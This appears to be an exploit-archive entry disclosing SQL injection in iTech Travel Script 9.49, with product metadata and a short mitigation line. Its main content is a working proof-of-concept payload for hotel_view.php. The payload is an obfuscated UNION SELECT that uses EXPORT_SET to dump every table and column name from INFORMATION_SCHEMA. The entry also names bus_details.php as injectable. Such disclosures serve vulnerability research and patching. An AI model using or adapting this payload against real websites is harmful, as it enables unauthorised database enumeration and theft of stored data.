vendor:
iTech Travel Script
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: iTech Travel Script
Affected Version From: 9.49
Affected Version To: 9.49
Patch Exists: N/A
Related CWE: N/A
CPE: a:itechscripts:itech_travel_script
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
iTech Travel Script 9.49 – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/hotel_view.php?id=[SQL] -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+- http://localhost/[PATH]/bus_details.php?id=[SQL]
Mitigation:
Input validation, parameterized queries, and stored procedures should be used to prevent SQL injection attacks.